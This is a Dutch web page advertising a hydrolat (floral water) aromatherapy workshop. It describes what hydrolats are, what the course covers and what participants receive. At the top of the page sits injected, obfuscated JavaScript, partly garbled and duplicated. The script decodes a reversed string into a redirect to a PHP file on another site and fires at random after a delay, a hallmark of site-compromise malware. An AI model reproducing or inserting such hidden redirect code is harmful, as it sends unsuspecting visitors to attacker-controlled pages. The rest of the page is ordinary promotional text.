)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}top=”40px” padding_bottoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom=”10px” bg_video=”” class=”” style=””]

De baten van hydrolaten

Ben jij nieuwsgierig naar de afkomst en de werking van de verschillende hydrolaten? Wil jij weten waar ze allemaal voor gebruikt kunnen worden?

Dan is mijn hydrolaten workshop echt iets voor jou.

Zacht met actieve bestanddelen

Hydrolaten OshadhiEen hydrolaat, ook wel hydrosol, bloemenwater, bloesemwater, aromawater of plantenwater genoemd, is door zijn zachte vorm zeer geschikt voor aromatherapie.
Het hydrolaat dat na destillatie van planten of bloemen, naast de essentiële olie, overblijft bevat actieve, wateraantrekkende (hydrofiele) bestanddelen.
Kinderen, volwassenen en dieren kunnen heel goed met hydrolaten worden behandeld.

Kennismaking met uiteenlopende hydrolaten

In de workshop maak je kennis met een groot assortiment hydrolaten. Hydrolaten die zeer geschikt zijn voor de huid, die gebruikt worden in drankjes, in gebak, in de keuken, in bad en onder de douche. Maar ook worden de sprays niet vergeten, zoals de luchtzuivering spray, de hydraterende huidspray en de spray tegen opvliegers.

Tijdens deze workshop leer je wat hydraten zijn, welke werking ze hebben, hoe je ze veilig gebruikt en opslaat. Ook besteden we aandacht aan de vervalsingen van hydrolaten.

Kosten en inhoud van de workshop

De kosten van deze workshop of een privé cursus zijn op aanvraag.
U kunt zowel pinnen als contant afrekenen.

Wat inbegrepen is:

  1. Zes uur lang zelf hydrolaten mengen
  2. Veel handige tips
  3. Een mooie en overzichtelijke reader
  4. Drie hydrolaten voor thuis
  5. Koffie en thee

Kijk in mijn agenda en reserveer een plek voor mijn workshop ‘De baten van hydrolaten’.